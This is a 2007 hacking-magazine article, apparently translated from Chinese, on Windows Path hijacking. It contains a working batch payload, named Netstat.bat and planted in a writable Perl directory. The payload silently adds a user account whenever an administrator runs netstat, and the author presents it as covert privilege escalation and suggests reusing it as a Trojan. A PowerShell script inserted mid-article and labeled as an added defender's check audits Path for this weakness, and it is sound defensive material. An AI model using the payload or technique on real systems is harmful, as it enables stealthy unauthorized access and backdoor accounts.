A talk on using environment variables in hacking - vulnerability warning - the Black Bar Safety Net

2007-11-19T00:00:00
ID MYHACK58:62200717662
Type myhack58
Reporter Anonymous
Modified 2007-11-19T00:00:00

Description

This article was submitted to issue 10 of Black Hand.

First, let's understand what environment variables are. Environment variables are generally parameters the operating system uses to describe its operating environment, such as the location of the temporary folder and the location of the system folder. This is somewhat like the default path of the DOS era: when you run a program, the system looks not only in the current folder but also in the configured default path. For example, the environment variable "Path" stores the directory paths where commonly used commands are kept.

To view the current system environment variables, use the SET command. The following is the output returned after running SET:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\Administrator\Application Data
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=145F63CA0A6F46D
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\Administrator
LOGONSERVER=\\145F63CA0A6F46D
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=D:\Progra~1\Borland\Delphi7\Bin;D:\Progra~1\Borland\Delphi7\Projects\Bpl\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 6, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f06
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
TMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
USERDOMAIN=145F63CA0A6F46D
USERNAME=Administrator
USERPROFILE=C:\Documents and Settings\Administrator
windir=C:\WINDOWS
======================================================================

We know that once we put NC and similar commonly used small tools into SYSTEM32, we can run the nc command no matter what our current directory is, which is quite convenient for hacking, isn't it? In fact, this is exactly the role of the Path variable. If the entire content of the Path variable is deleted, the system will no longer recognize the original system commands. That is, when we type one of these commands in CMD, the system looks for the matching program or file in the following order and runs it directly:
1. An executable file in the current directory.
2. The directories specified in the Path variable, searched in order.

OK, now that we have a basic understanding of environment variables, let's get to the topic: how to use environment variables for our hacking. We know that when PERL is installed, c:\perl\bin is prepended to the content of the Path variable (//the directory depends on where it was installed). When the administrator has configured permissions improperly, the permissions of this directory are neglected (under the default permission configuration, every user of the Windows operating system has write permission to it), which gives us exactly the conditions we need.

Below I give an example of how to use this. //Whether it works depends on the position of the directory in the Path variable and on whether the directory is writable. //The directory must come before the system's own directories in the environment variable.

Assume the conditions are as follows: the target has PERL installed, and the directory is c:\perl\bin //the directory is writable. The Path variable in the system environment variables is:
Path=c:\perl\bin\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
We can create the following file in this directory: Netstat.cmd or Netstat.bat //other commonly used system commands also work, please extrapolate! THX~
The file content is as follows:

@net user netpatch nspcn.org /add>nul
Rem remember to put @ in front of the command and >nul at the end
Rem @ hides the command itself
Rem >nul hides the output the command produces after it runs!
@%systemroot%\system32\netstat.exe %1 %2 %3 %4 %5 %6
Rem students who have learned batch commands should know that %1 %2 %3 etc. pass along the parameters

When the administrator runs the command, because c:\perl\bin comes earlier in the system's Path variable, the following happens when the administrator executes the Netstat command: the system first looks for an executable in the current directory, which by default is "C:\Documents and Settings\Administrator\" (depending on the logged-in user). When it cannot find the Netstat program there, it searches the directories defined in the Path variable in order, and the first one is of course c:\perl\bin... since the system is looking for an executable program, it naturally finds our Netstat.bat, and then of course runs the commands we set up. Because we constructed it cleverly, it exposes nothing of itself... a successful covert privilege escalation... this is one of the Thirty-Six Stratagems too...
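As an added defender's check (not from the original article), the following PowerShell script audits the machine-wide Path for the two conditions the technique above depends on: a Path directory that broad groups such as Users or Everyone can write to, and a .bat/.cmd/.exe/.com file in a Path directory whose name shadows a System32 executable. It assumes a modern Windows PowerShell host run as administrator so that every ACL can be read; the group names and the registry key are standard Windows values.

```powershell
# Added audit script, not code from the original article.
# Read the machine-scope Path as stored in the registry rather than the process copy,
# since the process copy may already have been altered by the user's environment.
$regKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
$machinePath = (Get-ItemProperty -Path $regKey -Name Path).Path
$dirs = $machinePath -split ';' | Where-Object { $_ -ne '' }

# Principals whose write access to a Path directory lets any local user plant a lookalike.
$broadPrincipals = @('Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData

# Base names of the real System32 executables (netstat, net, ...) that a script could shadow.
$system32 = Join-Path $env:SystemRoot 'System32'
$sysExe = Get-ChildItem -Path $system32 -Filter '*.exe' -ErrorAction SilentlyContinue |
          ForEach-Object { $_.BaseName.ToLowerInvariant() }

$findings = foreach ($dir in $dirs) {
    $resolved = [System.Environment]::ExpandEnvironmentVariables($dir)
    if (-not (Test-Path -LiteralPath $resolved -PathType Container)) { continue }

    # 1. Writable by a broad group: the precondition the article relies on.
    $acl = Get-Acl -LiteralPath $resolved
    $writable = $acl.Access | Where-Object {
        ($_.AccessControlType -eq 'Allow') -and
        ($broadPrincipals -contains $_.IdentityReference.Value) -and
        (($_.FileSystemRights -band $writeMask) -ne 0)
    }
    foreach ($ace in $writable) {
        [pscustomobject]@{ Directory = $resolved; Issue = 'Writable by broad group'
                           Detail = $ace.IdentityReference.Value }
    }

    # 2. A file whose name matches a System32 executable: the payload pattern described above.
    Get-ChildItem -LiteralPath $resolved -File -ErrorAction SilentlyContinue |
        Where-Object { ($_.Extension -in '.bat', '.cmd', '.exe', '.com') -and
                       ($sysExe -contains $_.BaseName.ToLowerInvariant()) } |
        ForEach-Object {
            [pscustomobject]@{ Directory = $resolved; Issue = 'Shadows System32 executable'
                               Detail = $_.Name }
        }
}

$findings | Format-Table -AutoSize
```

Any directory reported under the first issue should have its ACL tightened so only administrators can create files there; any file reported under the second issue should be compared against the vendor's install manifest before it is trusted.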

That's it for the privilege escalation tip... the clever among you may be thinking: what about using it as a Trojan? Oh~~ why not? If you have an idea, you have to try it... without testing, where would a positive result come from?